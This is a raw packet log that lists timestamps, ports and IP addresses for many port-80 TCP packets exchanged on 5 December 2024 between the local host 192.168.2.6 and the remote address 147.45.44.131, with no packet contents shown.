Dec 5, 2024 11:40:00.481995106 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.484430075 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.484445095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.484512091 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.486813068 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.486836910 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.486850023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.486913919 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.489379883 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.489392996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.489465952 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.491904020 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.491916895 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.491962910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.494283915 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.494297028 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.494332075 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.496347904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.496361017 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.496372938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.496433973 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.498356104 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.498369932 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.498419046 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.500715971 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.500730038 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.500783920 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.502583981 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.502599001 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.502659082 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.504738092 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.504750967 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.504795074 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.506834030 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.506846905 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.506860018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.506891966 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.508924007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.508936882 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.508975029 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.511107922 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.511121035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.511166096 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.513183117 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.513195992 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.513232946 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.515309095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.515327930 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.515340090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.515361071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.515398026 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.517417908 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.517438889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.517488956 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.519788027 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.519800901 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.519849062 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.521774054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.521786928 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.521828890 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.523859024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.523874044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.523941994 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.525872946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.525887012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.525902987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.525926113 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.528017044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.528032064 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.528074026 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.530105114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.530117989 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.530155897 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.532219887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.532233000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.532275915 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.534538984 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.534553051 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.534565926 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.534595013 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.534614086 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.536725998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.536740065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.536784887 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.538909912 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.538929939 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.539000034 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.541408062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.541421890 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.541502953 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.543564081 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.543579102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.543633938 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.545748949 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.545764923 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.545790911 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.545825005 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.547853947 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.547884941 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.547919989 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.600274086 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.633495092 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.633924961 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.633987904 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.634802103 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.634814978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.634972095 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.636636972 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.637541056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.637588978 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.638535023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.638549089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.638597965 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.640213966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.640228033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.640269995 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.642153978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.642169952 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.642227888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.644316912 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.644332886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.644378901 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.646027088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.646039963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.646085024 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.648015976 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.648029089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.648094893 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.650180101 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.650193930 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.650238037 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.652573109 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.652586937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.652631998 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.654406071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.654419899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.654433012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.654496908 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.656605959 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.656619072 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.656646013 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.658871889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.658896923 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.658916950 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.661868095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.661883116 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.661916971 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.663902044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.663916111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.663928986 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.663947105 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.663969040 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.666230917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.666245937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.666304111 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.668555021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.668569088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.668637991 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.670475960 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.670490026 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.670532942 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.672100067 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.672120094 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.672180891 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.673803091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.673815966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.673827887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.673867941 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.675787926 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.675801992 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.675848961 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.677642107 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.677655935 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.677690029 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.679994106 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.680007935 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.680057049 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.681929111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.681942940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.681953907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.681978941 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.682003021 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.684103012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.684118032 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.684159994 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.686141014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.686155081 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.686197996 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.688361883 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.688383102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.688430071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.690468073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.690481901 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.690526009 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.692509890 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.692523956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.692534924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.692565918 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.694055080 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.694068909 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.694103003 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.695910931 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.695924044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.695964098 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.697854042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.697866917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.697909117 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.699781895 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.699795961 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.699807882 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.699831963 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.699847937 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.701771021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.701792955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.701845884 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.703753948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.703775883 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.703824997 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.705678940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.705692053 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.705749035 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.707649946 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.707664013 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.707715034 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.709631920 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.709645987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.709657907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.709690094 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.711747885 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.711761951 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.711798906 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.713457108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.713471889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.713514090 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.715415001 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.715430021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.715472937 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.717834949 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.717848063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.717860937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.717895985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.717895985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.719516993 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.719537973 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.719588041 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.721275091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.721296072 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.721345901 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.723218918 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.723239899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.723285913 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.725135088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.725148916 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.725202084 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.727148056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.727161884 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.727173090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.727216005 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.729018927 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.729031086 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.729073048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.772188902 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.825042009 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.825550079 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.825618982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.826378107 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.826390982 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.826440096 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.827738047 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.828672886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.828735113 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.829660892 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.829674959 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.829716921 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.831590891 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.831604958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.831655979 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.833026886 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.833039999 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.833095074 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.835134029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.835146904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.835216999 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.836694002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.836705923 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.836752892 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.838304996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.838319063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.838366032 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.840055943 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.840069056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.840111017 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.842000961 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.842014074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.842084885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.843960047 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.843975067 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.844017982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.845904112 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.845917940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.845977068 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.847870111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.847882986 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.847894907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.847950935 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.850102901 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.850116968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.850152016 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.851732016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.851743937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.851797104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.853703022 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.853720903 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.853760958 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.855657101 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.855671883 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.855684042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.855710983 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.855751038 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.857768059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.857783079 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.857852936 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.859539032 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.859559059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.859602928 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.861510992 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.861526012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.861572027 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.863480091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.863493919 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.863538980 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.865761995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.865777969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.865788937 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.865840912 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.867567062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.867587090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.867624044 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.869610071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.869633913 CET	80	49708	147.45.44.131	192.168.2.6
